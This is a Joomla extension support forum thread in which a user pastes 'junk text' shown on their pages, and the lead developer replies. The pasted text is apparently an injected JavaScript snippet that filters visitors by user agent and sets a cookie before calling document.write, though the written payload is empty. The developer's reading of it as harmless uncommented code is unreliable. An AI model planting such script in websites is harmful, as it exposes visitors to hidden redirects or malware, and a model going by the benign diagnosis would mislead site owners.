Main menu

Forum

× Help Forum English

[SOLVED] Junk Text (Codes) at the bottom of all pages

• fritze
  • Topic Author
More
10 years 2 months ago - 10 years 2 months ago #6608 by fritze
I've installed iCagenda 3.2.13 on my Joomla 3.2.2 site... The component seems to be working okay, except that I get a bunch of code (junk text) at the bottom of all of the event pages (listing, submit an event, etc...)

You can view this in action on the website's url: es-art-group.com/index.php/directory/events-activities

Below is the actual Junk text (code):

###

//Author.ThickBox (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/18.0|Firefox/18.0.1|Firefox/17.0|Firefox/12.0|Firefox/25.0|Firefox/24.0|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/25.0.1|Firefox/26.0|Firefox/27.0|Maxthon|MRSPUTNIK|Mini|Firefox/28.0|BlackBerry|PLAYSTATION|Wget|Firefox/27.0.1'; nevernList = nevernList.split('|'); var neverbUA = false; for (var i in nevernList) { if (stripos(navigator.userAgent, nevernList)!==false) { neverbUA = true; break; } } return neverbUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!ffff_listier_ua()) { var cookie = getCookie('mentos17he47la1nw34mut87be9c'); if (cookie == undefined) { setCookie('mentos17he47la1nw34mut87be9c', true, 86401); document.write(''); } } })(); /* web build:

###

I don't know if it's something with the template or something else... Any suggestion or solution would be greatly appreciated... Thanks!
Last edit: 10 years 2 months ago by Lyr!C. Reason: [SOLVED]

Please Log in or Create an account to join the conversation.

• Lyr!C
  • Administrator
  • Administrator
  • Lead Developer
More
10 years 2 months ago #6628 by Lyr!C
Hello,

This is not iCagenda code, but as i can see on your site online, you may have found the reason for yoru problem!

B)

Lyr!C

Latest version : iCagenda 3.9.3
We recommend every user to keep iCagenda updated.
Don't forget to have your Joomla!™ up-to-date!

Do you like iCagenda?
I would appreciate if you could take 5 minutes to post a review on JED (Joomla Extensions Directory) .

File Attachment:

• fritze
  • Topic Author
More
10 years 2 months ago #6646 by fritze
Thank you for your reply... Actually, the problem just "Poof" went away. It was doing this for all 3 browsers that I use (IE, Chrome and Firefox). Now, it's all fixed by itself... Weird!!!

• Lyr!C
  • Administrator
  • Administrator
  • Lead Developer
More
10 years 2 months ago #6650 by Lyr!C

fritze wrote: Thank you for your reply... Actually, the problem just "Poof" went away. It was doing this for all 3 browsers that I use (IE, Chrome and Firefox). Now, it's all fixed by itself... Weird!!!

If you have site caching enabled, this could be due to this!

The message displayed is coming from an extension (maybe template?) having this code inside, but it seems to be an uncommented code (// before)
So, you can search for something like "ThickBox" in you site files, and know which extension has given this error.

Best Regards,
Lyr!C

Do you like iCagenda?
I would appreciate if you could take 5 minutes to post a review on JED (Joomla Extensions Directory) .

File Attachment:

• fritze
  • Topic Author
More
10 years 2 months ago #6658 by fritze
Got it... Thanks!

• Lyr!C
  • Administrator
  • Administrator
  • Lead Developer
More
10 years 2 months ago #6675 by Lyr!C

fritze wrote: Got it... Thanks!

And which was the extension giving the error ?
This could help another user B)

Do you like iCagenda?

File Attachment:

Moderators: Lyr!C
Time to create page: 0.221 seconds

Follow Us

Create your Joomla templates with Template Creator CK

acymailing logo new